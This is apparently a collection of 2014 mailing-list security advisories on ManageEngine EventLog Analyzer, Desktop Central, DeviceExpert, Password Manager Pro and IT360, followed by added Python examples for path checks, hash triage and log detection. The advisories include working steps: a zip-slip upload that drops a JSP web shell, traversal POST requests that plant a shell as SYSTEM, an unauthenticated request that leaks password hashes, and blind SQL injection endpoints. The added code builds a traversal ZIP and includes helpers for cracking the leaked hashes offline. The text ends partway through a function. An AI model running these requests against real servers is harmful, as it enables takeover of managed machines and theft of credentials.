 privileged users and comply to different compliance regulatory bodies
 by intelligently analyzing your logs and instantly generating a variety of
 reports like user activity reports, regulatory compliance reports,
 historical trend reports, and more.


 Business recommendation:
 --
 During a penetration test, multiple vulnerabilities have been identified
 that are based on severe design/implementation flaws in the application.
 It is highly recommended not to use this software until a thorough
 security review has been performed by security professionals and all
 identified issues have been resolved.


 Vulnerability description:
 --
 1) Unauthenticated remote code execution
 ME EventLog Analyzer contains an agentUpload servlet which is used by Agents
 to send log data as zip files to the central server. Files can be uploaded
 without authentication and are stored/decompressed in the data subdirectory.

 As the decompress procedure is handling the file names in the ZIP file in an
 insecure way it is possible to store files in the web root of the server. This can
 be used to upload/execute code with the rights of the application server.

 2) Authorization issues
 The EventLog Analyzer web interface does not check if an authenticated user has
 sufficient permissions to access certain parts of the application. A low
 privileged user (for example guest) can therefore access critical sections of the
 web interface by directly calling the corresponding URLs. This can be used to
 access the database browser of the application which gives the attacker full
 access to the database.


 Proof of concept:
 --
 1) Unauthenticated remote code execution


 - Create a malicious zip archive with the help of evilarc[1]
 evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
 - Send the malicious archive to the agentUpload servlet
 curl -F payload=@evil.zip http://172.16.37.131:8400/agentUpload
 - Enjoy your shell
 http://172.16.37.131:8400/cmdshell.jsp

 A working Metasploit module will be released next week.


 2) Authorization issues
 - Log in as a low privileged user (for example guest/guest)
 - Directly call the URL of the database browser
 http://xxx.xxx.xxx.xxx:8400/event/runQuery.do


 Vulnerable / tested versions:
 --
 EventLog Analyzer 8.2 (Build 8020) (Windows)
 EventLog Analyzer 8.2 (Build 8020) (Linux)
 EventLog Analyzer 9.0 (Build 9002) (Windows)
 EventLog Analyzer 9.0 (Build 9002) (Linux)

 Other versions might also be vulnerable.


 Disclosure timeline:
 --
 14/04/2013: Vulnerability discovery
 18/04/2013: Informed vendor via ManageEngine Security Response Center (MESRC) Form
 23/04/2013: Second try to contact MESRC, as we didn't receive any response from
 the first try.
 23/04/2013: Response from vendor, they wait on some feedback from the
 development team
 10/05/2013: Response from vendor, saying that this is rather an issue than a
 vulnerability, will fix it anyway
 13/05/2013: Technical details including a working proof of concept sent to
 ManageEngine.
 13/05/2013: Vendor response, say that they forward it to the development team
 24/05/2013: Vendor response, saying that they will fix it in 2013 as they are
 tightly scheduled on other priorities
 24/05/2013: Response from us, asking if we will be informed when the
 vulnerability is fixed
 28/05/2013: Response from ManageEngine, saying that we must subscribe to their
 newsletter for release information
 05/09/2013: Verification that exploit is still working

[FD] [The ManageOwnage Series, part IV]: RCE / file upload in Eventlog Analyzer, feat. special guests h0ng10 and Mogwai Security

2014-09-01 Thread Pedro Ribeiro
Hi all,

h0ng10 from Mogwai Security has found a file upload leading to RCE in
Eventlog Analyzer (see advisory below for a snippet or go to
http://seclists.org/fulldisclosure/2014/Aug/86).

h0ng10 communicated this over a year ago to ManageEngine but they
failed to fix it. When I found and communicated the same vulnerability
to ManageEngine a week ago, they accepted my report as valid and said
they would look into it. There was no mention of h0ng10's previous
discovery, so I don't know what they did with it - perhaps they lost
or misplaced it?

Anyway, I had an exploit ready for when they fixed it, but since the
vulnerability information is out, I'm releasing the exploit today.
The exploit credits h0ng10 as the original vulnerability discoverer
and can be found at:
https://github.com/rapid7/metasploit-framework/pull/3732
This will hopefully be integrated in Metasploit soon. The exploit has
been thoroughly tested in many Windows and Linux versions.

Thanks to h0ng10 and Mogwai Security for featuring in the ManageOwnage Series!

Regards,
Pedro

On 31 August 2014 16:39, Advisories advisor...@mogwaisecurity.de wrote:
 Mogwai Security Advisory MSA-2014-01
 --
 Title:  ManageEngine EventLog Analyzer Multiple Vulnerabilities
 Product:ManageEngine EventLog Analyzer
 Affected versions:  EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
 Impact: critical
 Remote: yes
 Product link:   http://www.manageengine.com/products/eventlog/
 Reported:   18/04/2013
 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)




 Vulnerability description:
 --
 1) Unauthenticated remote code execution
 ME EventLog Analyzer contains an agentUpload servlet which is used by Agents
 to send log data as zip files to the central server. Files can be uploaded
 without authentication and are stored/decompressed in the data subdirectory.

 As the decompress procedure is handling the file names in the ZIP file in an
 insecure way it is possible to store files in the web root of the server. This can
 be used to upload/execute code with the rights of the application server.


 Proof of concept:
 --
 1) Unauthenticated remote code execution


 - Create a malicious zip archive with the help of evilarc[1]
 evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
 - Send the malicious archive to the agentUpload servlet
 curl -F payload=@evil.zip http://172.16.37.131:8400/agentUpload
 - Enjoy your shell
 http://172.16.37.131:8400/cmdshell.jsp

 A working Metasploit module will be released next week.


 --
 Mogwai, IT-Sicherheitsberatung Muench
 Steinhoevelstrasse 2/2
 89075 Ulm (Germany)

 i...@mogwaisecurity.de




[FD] [The ManageOwnage Series, part III]: Multiple vulnerabilities / RCE in ManageEngine Desktop Central

2014-08-31 Thread Pedro Ribeiro
Hi,

This is the 3rd part of the ManageOwnage series. For previous chapters see:
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75

tl;dr
CVE-2014-5005, 5006 and 5007 - RCE via file upload in Desktop Central
Metasploit module will be released soon.
A copy of the advisory below is available in my repo at
https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt

Regards,
Pedro


 Arbitrary file upload / remote code execution in ManageEngine Desktop 
 Central / Desktop Central MSP
 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
=

 Background on the affected product:
Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more.

There are several vulnerable servers out there if you know the
Google dorks. Quoting the author of the Internet Census 2012: "As a
rule of thumb, if you believe that nobody would connect that to the
Internet, really nobody, there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution
as SYSTEM in Windows. I've updated the desktopcentral_file_upload
Metasploit module to use the new statusUpdate technique. Needless to
say, owning a Desktop Central box will give you control of all the
computers and smartphones it manages.

 Technical details:
#1
Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
Constraints: none; no authentication or any other information needed

a)
CVE-2014-5005
Affected versions: all versions from v7 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
POST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1
... your favourite jsp shell here ...

b)
CVE-2014-5006
Affected versions: all versions from v8 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
POST /mdm/mdmLogUploader?filename=..\\..\\..\webapps\\DesktopCentral\\shell.jsp
... your favourite jsp shell here ...


#2
CVE-2014-5007
Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
Constraints: no authentication needed; need to know valid
computerName, domainName and customerId
Affected versions: all versions from v7 to v9 build 90054
Fix: Upgrade to DC v9 build 90055
Notes: This was previously discovered as CVE-2013-7390 / OSVDB-10008
by Thomas Hibbert, and was fixed in 2013-11-09. The fix is
incomplete and it is still possible to upload a shell with a valid
computerName, domainName and customerId.

POST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\..\\..\\..\\webapps\\DesktopCentral\\shell.jsp
... your favourite jsp shell here ...

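Added example (not code from the Mogwai advisory, from evilarc, or from the ManageEngine products) of the path-containment check that the vulnerable endpoints on this page lack: the agentUpload ZIP extraction in EventLog Analyzer, the fileName/filename upload parameters in Desktop Central above, and the schFilePath/fileName download parameters in NetFlow Analyzer and the FailOverServlet. Directory names such as `/srv/ela/data/incoming` and `/srv/dc/data` are made up; the ZIP is built in memory to mirror `evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp`, and only the would-be target paths are computed, nothing is written to disk:

```python
import io
import posixpath
import re
import zipfile


def safe_join(base, untrusted):
    """Absolute POSIX path for `untrusted` under `base`, or None if it would escape
    `base` (../ traversal, absolute path, or a Windows drive letter). Backslashes are
    treated as separators because the Windows builds of these products accept them."""
    name = untrusted.replace("\\", "/")
    if name.startswith("/") or re.match(r"^[A-Za-z]:", name):
        return None
    base = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(base, name))
    if target == base or not target.startswith(base + "/"):
        return None
    return target


def build_evil_zip(depth=2, prefix="webapps/event", member="cmdshell.jsp",
                   content=b"<%-- constructed placeholder, not a real shell --%>"):
    """In-memory equivalent of `evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp`:
    one entry whose name climbs `depth` directories before descending into `prefix`."""
    name = "../" * depth + posixpath.join(prefix, member)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, content)  # zipfile does not sanitise entry names on write
    return buf.getvalue()


def extract_targets_naive(zip_bytes, dest):
    """Where an extractor that simply joins dest + entry name would write each entry.
    Only the paths are computed; nothing is written."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [posixpath.normpath(posixpath.join(dest, n)) for n in zf.namelist()]


def extract_targets_safe(zip_bytes, dest):
    """Same, but every entry goes through safe_join and escaping entries are dropped."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        targets = (safe_join(dest, n) for n in zf.namelist())
        return [t for t in targets if t is not None]


if __name__ == "__main__":
    upload_dir = "/srv/ela/data/incoming"  # made-up data subdirectory
    evil = build_evil_zip()
    print("naive extractor writes:", extract_targets_naive(evil, upload_dir))
    print("safe extractor writes: ", extract_targets_safe(evil, upload_dir))
    for p in ("../../../../../../shell.jsp",
              "..\\..\\..\\..\\webapps\\DesktopCentral\\shell.jsp",
              "C:\\boot.ini", "/etc/passwd", "agent1/log.txt"):
        print(repr(p), "->", safe_join("/srv/dc/data", p))
```

The same `safe_join` serves both directions: it rejects the upload names that land a JSP in a webapps directory and the download names that reach boot.ini or /etc/passwd, while an ordinary relative name under the intended directory passes.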


Re: [FD] [The ManageOwnage Series, part II]: User credential disclosure in ManageEngine DeviceExpert

2014-08-29 Thread Pedro Ribeiro
Hi Keith,

Thanks for pointing this out.
I realised the advisory is not very clear - you are right, it is a base64
encoded MD5 hash. To get the actual hash you have to use the following Ruby
code:
require 'base64'
Base64.decode64(password).unpack('H*')

The hash is an MD5 of
"admin12345678"

Also ManageEngine have decided to fix the issue, and have now released
version 5.9 build 5981 that resolves this vulnerability.

I've updated the advisory at
https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt

Regards
Pedro
On 28 Aug 2014 18:43, Keith I Myers keithiokepamy...@gmail.com wrote:

Are you sure that this is an MD5 Hash? It looks more like a base64 encoded
string (decoded value  :N yZX@{ )


On Wed, Aug 27, 2014 at 5:50 PM, Pedro Ribeiro ped...@gmail.com wrote:

 On 27 Aug 2014 19:14, Pedro Ribeiro ped...@gmail.com wrote:
 
  Hi,
 
  You can read the usernames and MD5 hashed passwords of all the users
  in the Device Expert application by sending an unauthenticated
  request.
  I am releasing this as a 0 day as ManageEngine have responded that
  they do not consider this a priority and won't fix it in the near
  future unless a customer requests it. See details below.
 
   User credential disclosure in ManageEngine DeviceExpert 5.9
   Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
 Security
 
 ==
 
   Background on the affected product:
  DeviceExpert is a web–based, multi vendor network change,
  configuration and compliance management (NCCCM) solution for switches,
  routers, firewalls and other network devices. Trusted by thousands of
  network administrators around the world, DeviceExpert helps automate
  and take total control of the entire life cycle of device
  configuration management.
 
 
   Technical details:
  Vulnerability: User credential disclosure / CVE-2014-5377
  Constraints: no authentication or any other information needed.
  Affected versions: UNFIXED as of 27/08/2014 - current version 5.9
  build 5980 is vulnerable, older versions likely vulnerable
 
  GET /ReadUsersFromMasterServlet
 
   Example response:
   <?xml version="1.0" encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>nore...@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
 
  The passwords are a salted MD5 hash.
 
  A copy of this advisory is available at my repo:
 
 https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt
 
  Regards,
  Pedro

 To clarify, older versions are definitely vulnerable, I just don't know on
 which versions the vulnerability initially appeared.





-- 

Keith Myers
Mobile : (305) 929-3475
EMail : keithiokepamy...@gmail.com

+Keith I Myers http://plus.kmyers.me

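Added example (not Pedro's or ManageEngine's code) of what a practitioner does with the ReadUsersFromMasterServlet output above: decode the Base64 password field back to the raw MD5 digest and test candidate passwords against it with the returned salt, offline. The password-then-salt concatenation order follows the reply above; trying both orders is a precaution, and the `hunter2` candidate and its hash are constructed for the demonstration:

```python
import base64
import hashlib


def decode_hash(b64_hash):
    """The password field is Base64 of the raw 16 MD5 bytes; return it as hex."""
    return base64.b64decode(b64_hash).hex()


def make_hash(password, salt):
    """Produce a value in the same format, using the password+salt order from the
    reply above. Used here only to build a known test vector."""
    digest = hashlib.md5((password + salt).encode()).digest()
    return base64.b64encode(digest).decode()


def verify_candidates(hex_digest, salt, candidates):
    """Offline check of candidate passwords against a leaked digest and its salt.
    Both concatenation orders are tried; returns (password, order) or None."""
    for password in candidates:
        for order, data in (("password+salt", password + salt),
                            ("salt+password", salt + password)):
            if hashlib.md5(data.encode()).hexdigest() == hex_digest:
                return password, order
    return None


if __name__ == "__main__":
    # Values taken from the example response quoted above.
    leaked = "Ok6/FqR5WtJY5UCLrnvjQQ=="
    salt = "12345678"
    digest = decode_hash(leaked)
    print("raw MD5 digest:", digest)
    print("match:", verify_candidates(digest, salt, ["admin", "password", "changeme"]))
```

Because the salt is returned alongside the hash and MD5 is fast, a leaked record is effectively a wordlist away from the plaintext; this is why the unauthenticated disclosure is as serious as the advisory says.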

Re: [FD] [The ManageOwnage Series, part I]: blind SQL injection in two servlets (metasploit module included)

2014-08-29 Thread Pedro Ribeiro
On 19 Aug 2014 17:55, Pedro Ribeiro ped...@gmail.com wrote:

 TL;DR
 CVE-2014-3996 / CVE-2014-3997
 Blind SQL injection in ManageEngine Desktop Central, Password Manager
 Pro and IT360 (including MSP versions)
 Scroll to the bottom for the Metasploit module link; the module will
 be submitted to Metasploit proper in a pull request in the next few
 days.

 ==
  Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro
  and IT360 (including MSP versions)
  Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
 ==

  Background on the affected products:
 Desktop Central is an integrated desktop & mobile device management
 software that helps in managing the servers, laptops, desktops,
 smartphones and tablets from a central point. It automates your
 regular desktop management routines like installing patches,
 distributing software, managing your IT Assets, managing software
 licenses, monitoring software usage statistics, managing USB device
 usage, taking control of remote desktops, and more.

 Password Manager Pro is a secure vault for storing and managing
 shared sensitive information such as passwords, documents and digital
 identities of enterprises.

 Managing mission critical business applications is now made easy
 through ManageEngine IT360. With agentless monitoring methodology,
 monitor your applications, servers and databases with ease. Agentless
 monitoring of your business applications enables you high ROI and low
 TOC. With integrated network monitoring and bandwidth utilization,
 quickly troubleshoot any performance related issue with your network
 and assign issues automatically with ITIL based ServiceDesk
 integration.

 These products have managed service providers (MSP) versions which are
 used to control the desktops and smartphones of several clients.
 Quoting the author of the Internet Census 2012: "As a rule of thumb,
 if you believe that nobody would connect that to the Internet, really
 nobody, there are at least 1000 people who did."
 These vulnerabilities can be abused to achieve remote code execution
 as SYSTEM in Windows or as the user in Linux. Needless to say, owning
 a Desktop Central / IT360 box will give you control of all the
 computers and smartphones it manages, while owning Password Manager
 Pro will give you a treasure trove of passwords.

  Technical details:
 The two blind SQL injections described below have been present in
 Desktop Central, Password Manager Pro and IT360 in all releases since
 2006. They can only be triggered via a GET request, which means you
 can only inject around 8000 characters at a time.

 #1
 Vulnerability:
 Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP
 / authenticated on IT360)
 CVE-2014-3996

 Affected products / versions:
 - ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to
 v9 build 90033
 - ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5
 to version 7 build 7002
 - ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
 This affects all versions of the products released since 19-Apr-2006.
 Other ManageEngine products might be affected.

 Constraints:
 - DC: no authentication or any other information needed
 - PMP: no authentication or any other information needed
 - IT360: valid user account needed

 Proof of concept:

 DC / PMP:
 GET /LinkViewFetchServlet.dat?sv=[SQLi]

 IT360:
 GET /console/LinkViewFetchServlet.dat?sv=[SQLi]


 #2
 Vulnerability:
 Blind SQL injection in MetadataServlet (unauthenticated on PMP /
 authenticated on IT360)
 CVE-2014-3997

 Affected products / versions:
 - ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5
 to version 7 build 7003
 - ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
 This affects all versions of the products released since 03-Apr-2008.
 Other ManageEngine products might be affected.

 Constraints:
 - PMP: no authentication or any other information needed
 - IT360: valid user account needed

 Proof of concept:

 PMP:
 GET /MetadataServlet.dat?sv=[SQLi]

 IT360:
 GET /console/MetadataServlet.dat?sv=[SQLi]

 ==
 A full text version of this advisory can be found in my repo:

https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt

 A Metasploit module that exploits this vulnerability can also be found
 in my repo:

https://raw.githubusercontent.com/pedrib/PoC/master/msf_modules/manageengine_dc_pmp_sqli.rb

 Regards,
 Pedro

I realised the advisory is not explicit as to what the fixed versions are,
so here it is:

Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build
10330

The advisory in my repo has also been updated:
https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt

[FD] [The ManageOwnage Series, part II]: User credential disclosure in ManageEngine DeviceExpert

2014-08-27 Thread Pedro Ribeiro
Hi,

You can read the usernames and MD5 hashed passwords of all the users
in the Device Expert application by sending an unauthenticated
request.
I am releasing this as a 0 day as ManageEngine have responded that
they do not consider this a priority and won't fix it in the near
future unless a customer requests it. See details below.

 User credential disclosure in ManageEngine DeviceExpert 5.9
 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
==

 Background on the affected product:
DeviceExpert is a web–based, multi vendor network change,
configuration and compliance management (NCCCM) solution for switches,
routers, firewalls and other network devices. Trusted by thousands of
network administrators around the world, DeviceExpert helps automate
and take total control of the entire life cycle of device
configuration management.


 Technical details:
Vulnerability: User credential disclosure / CVE-2014-5377
Constraints: no authentication or any other information needed.
Affected versions: UNFIXED as of 27/08/2014 - current version 5.9
build 5980 is vulnerable, older versions likely vulnerable

GET /ReadUsersFromMasterServlet

Example response:
<?xml version="1.0" encoding="UTF-8"?>
<discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>nore...@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>

The passwords are a salted MD5 hash.

A copy of this advisory is available at my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt

Regards,
Pedro


Re: [FD] [The ManageOwnage Series, part II]: User credential disclosure in ManageEngine DeviceExpert

2014-08-27 Thread Pedro Ribeiro
On 27 Aug 2014 19:14, Pedro Ribeiro ped...@gmail.com wrote:

 Hi,

 You can read the usernames and MD5 hashed passwords of all the users
 in the Device Expert application by sending an unauthenticated
 request.
 I am releasing this as a 0 day as ManageEngine have responded that
 they do not consider this a priority and won't fix it in the near
 future unless a customer requests it. See details below.

  User credential disclosure in ManageEngine DeviceExpert 5.9
  Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
 ==

  Background on the affected product:
 DeviceExpert is a web–based, multi vendor network change,
 configuration and compliance management (NCCCM) solution for switches,
 routers, firewalls and other network devices. Trusted by thousands of
 network administrators around the world, DeviceExpert helps automate
 and take total control of the entire life cycle of device
 configuration management.


  Technical details:
 Vulnerability: User credential disclosure / CVE-2014-5377
 Constraints: no authentication or any other information needed.
 Affected versions: UNFIXED as of 27/08/2014 - current version 5.9
 build 5980 is vulnerable, older versions likely vulnerable

 GET /ReadUsersFromMasterServlet

 Example response:
 <?xml version="1.0" encoding="UTF-8"?>
 <discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>nore...@zohocorp.com</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>

 The passwords are a salted MD5 hash.

 A copy of this advisory is available at my repo:
 https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt

 Regards,
 Pedro

To clarify, older versions are definitely vulnerable, I just don't know on
which versions the vulnerability initially appeared.

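The response format quoted above is enough to triage a leaked user list offline. What follows is an added example, not code from the advisory or from ManageEngine: it parses a ReadUsersFromMasterServlet-style response, checks that each base64 password field decodes to the 16 bytes an MD5 digest occupies, emits hex-digest:salt lines for an offline cracker, and tests candidate passwords. The advisory says the hashes are salted MD5 but not whether the salt is prepended or appended, so check_candidates tries both orderings. The sample response, its usernames and e-mail addresses, and the password "Secret123" are constructed for this example; the first hash is generated as MD5(salt + password) so the check has a known answer.

```python
"""Triage of a ReadUsersFromMasterServlet response (CVE-2014-5377).

Added example; not code from the advisory. The endpoint returns every user's
base64-encoded salted MD5 hash and the salt without authentication. The
advisory does not say whether the salt is prepended or appended, so
check_candidates() tries both orderings. The sample response below is
constructed; its first hash is generated here as MD5(salt + "Secret123").
"""
import base64
import binascii
import hashlib
import xml.etree.ElementTree as ET


def salted_md5(salt: str, password: str, salt_first: bool) -> bytes:
    """MD5 over salt+password (salt_first=True) or password+salt."""
    data = (salt + password) if salt_first else (password + salt)
    return hashlib.md5(data.encode("utf-8")).digest()


# Constructed sample modelled on the response format quoted in the advisory.
SAMPLE_SALT = "12345678"
SAMPLE_HASH = base64.b64encode(salted_md5(SAMPLE_SALT, "Secret123", True)).decode()
BOGUS_HASH = base64.b64encode(b"not-an-md5-hash").decode()  # 15 bytes, not a digest
SAMPLE_RESPONSE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    "<discoveryresult>"
    "<discoverydata><username>admin</username><userrole>Administrator</userrole>"
    f"<password>{SAMPLE_HASH}</password><emailid>admin@example.invalid</emailid>"
    f"<saltvalue>{SAMPLE_SALT}</saltvalue></discoverydata>"
    "<discoverydata><username>operator</username><userrole>Operator</userrole>"
    f"<password>{BOGUS_HASH}</password><emailid>ops@example.invalid</emailid>"
    "<saltvalue>abcdefgh</saltvalue></discoverydata>"
    "</discoveryresult>"
)


def parse_users(xml_text):
    """Return one dict per <discoverydata> element with the decoded digest."""
    if isinstance(xml_text, str):
        xml_text = xml_text.encode("utf-8")
    root = ET.fromstring(xml_text)
    users = []
    for node in root.iter("discoverydata"):
        try:
            digest = base64.b64decode(node.findtext("password", ""), validate=True)
        except binascii.Error:
            digest = b""
        users.append({
            "username": node.findtext("username", ""),
            "role": node.findtext("userrole", ""),
            "email": node.findtext("emailid", ""),
            "salt": node.findtext("saltvalue", ""),
            "digest": digest,
            "md5_sized": len(digest) == 16,  # an MD5 digest is exactly 16 bytes
        })
    return users


def cracker_lines(users):
    """hex-digest:salt lines, one per record whose digest is MD5-sized."""
    return [f"{u['digest'].hex()}:{u['salt']}" for u in users if u["md5_sized"]]


def check_candidates(user, candidates):
    """Return (password, ordering) for the first candidate that reproduces
    the stored digest under either salt ordering, or None."""
    if not user["md5_sized"]:
        return None
    for password in candidates:
        for salt_first in (True, False):
            if salted_md5(user["salt"], password, salt_first) == user["digest"]:
                return password, "md5(salt+password)" if salt_first else "md5(password+salt)"
    return None


if __name__ == "__main__":
    found = parse_users(SAMPLE_RESPONSE)
    for u in found:
        print(u["username"], u["role"], "md5-sized" if u["md5_sized"] else "unexpected length")
    print(check_candidates(found[0], ["password", "admin", "Secret123"]))
```

A real response can be passed to parse_users unchanged. A record whose password field does not decode to 16 bytes is still listed but left out of cracker_lines, because whatever it is, it is not a raw MD5 digest; the ordering that check_candidates reports tells you which salted-MD5 mode to select in an offline cracker.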

[FD] [The ManageOwnage Series, part I]: blind SQL injection in two servlets (metasploit module included)

2014-08-20 Thread Pedro Ribeiro
TL;DR
CVE-2014-3996 / CVE-2014-3997
Blind SQL injection in ManageEngine Desktop Central, Password Manager
Pro and IT360 (including MSP versions)
Scroll to the bottom for the Metasploit module link; the module will
be submitted to Metasploit proper in a pull request in the next few
days.

==
 Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro 
 and IT360 (including MSP versions)
 Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security
==

 Background on the affected products:
Desktop Central is an integrated desktop & mobile device management
software that helps in managing the servers, laptops, desktops,
smartphones and tablets from a central point. It automates your
regular desktop management routines like installing patches,
distributing software, managing your IT Assets, managing software
licenses, monitoring software usage statistics, managing USB device
usage, taking control of remote desktops, and more.

Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.

Managing mission critical business applications is now made easy
through ManageEngine IT360. With agentless monitoring methodology,
monitor your applications, servers and databases with ease. Agentless
monitoring of your business applications enables you high ROI and low
TOC. With integrated network monitoring and bandwidth utilization,
quickly troubleshoot any performance related issue with your network
and assign issues automatically with ITIL based ServiceDesk
integration.

These products have managed service providers (MSP) versions which are
used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb,
if you believe that nobody would connect that to the Internet, really
nobody, there are at least 1000 people who did."
These vulnerabilities can be abused to achieve remote code execution
as SYSTEM in Windows or as the user in Linux. Needless to say, owning
a Desktop Central / IT360 box will give you control of all the
computers and smartphones it manages, while owning Password Manager
Pro will give you a treasure trove of passwords.

 Technical details:
The two blind SQL injections described below have been present in
Desktop Central, Password Manager Pro and IT360 in all releases since
2006. They can only be triggered via a GET request, which means you
can only inject around 8000 characters at a time.

#1
Vulnerability:
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP
/ authenticated on IT360)
CVE-2014-3996

Affected products / versions:
- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to
v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5
to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006.
Other ManageEngine products might be affected.

Constraints:
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]

IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]


#2
Vulnerability:
Blind SQL injection in MetadataServlet (unauthenticated on PMP /
authenticated on IT360)
CVE-2014-3997

Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5
to version 7 build 7003
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008.
Other ManageEngine products might be affected.

Constraints:
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

PMP:
GET /MetadataServlet.dat?sv=[SQLi]

IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]

==
A full text version of this advisory can be found in my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt

A Metasploit module that exploits this vulnerability can also be found
in my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/msf_modules/manageengine_dc_pmp_sqli.rb

Regards,
Pedro

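Added example, not code from the advisory or from the Metasploit module linked above: detection logic for the two servlets, run over constructed Combined Log Format lines, plus a check of an installed build against the first fixed builds the author gave in his follow-up (DC 90043, PMP 7003, IT360 10330). The servlet paths, the sv parameter, the GET-only constraint and the fixed builds come from the advisory; the SQL keyword heuristic, the 1000-character length threshold and the log lines are assumptions made for this example.

```python
"""Access-log detection for the LinkViewFetchServlet / MetadataServlet blind
SQL injection (CVE-2014-3996 / CVE-2014-3997) plus an affected-build check.

Added example; not code from the advisory or its Metasploit module.
Assumptions: Combined Log Format lines, the SQL keyword heuristic below, and
the fixed builds given in the author's follow-up (DC 90043, PMP 7003,
IT360 10330). All sample log lines are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Servlet paths named in the advisory: DC/PMP at the root, IT360 under /console.
VULN_PATHS = {
    "/LinkViewFetchServlet.dat": "CVE-2014-3996",
    "/console/LinkViewFetchServlet.dat": "CVE-2014-3996",
    "/MetadataServlet.dat": "CVE-2014-3997",
    "/console/MetadataServlet.dat": "CVE-2014-3997",
}

# First fixed build per product (from the follow-up); lower builds are affected.
FIXED_BUILDS = {"DC": 90043, "PMP": 7003, "IT360": 10330}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Heuristic: SQL metacharacters or keywords in the decoded parameter value.
SQLI_RE = re.compile(
    r"(?:'|--|/\*|;|\|\||\b(?:OR|AND|UNION|SELECT|SLEEP|PG_SLEEP|WAITFOR|BENCHMARK)\b)",
    re.IGNORECASE,
)
LONG_VALUE = 1000  # assumed threshold: legitimate sv values are short, injections are not


def parse_line(line):
    """Parse one log line into a dict, or return None if it is not one."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes, so the heuristic sees the value the servlet saw
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """CVE id if the entry looks like a probe of a vulnerable servlet, else None."""
    cve = VULN_PATHS.get(entry["path"])
    if cve is None or entry["method"] != "GET":  # advisory: only GET reaches the sink
        return None
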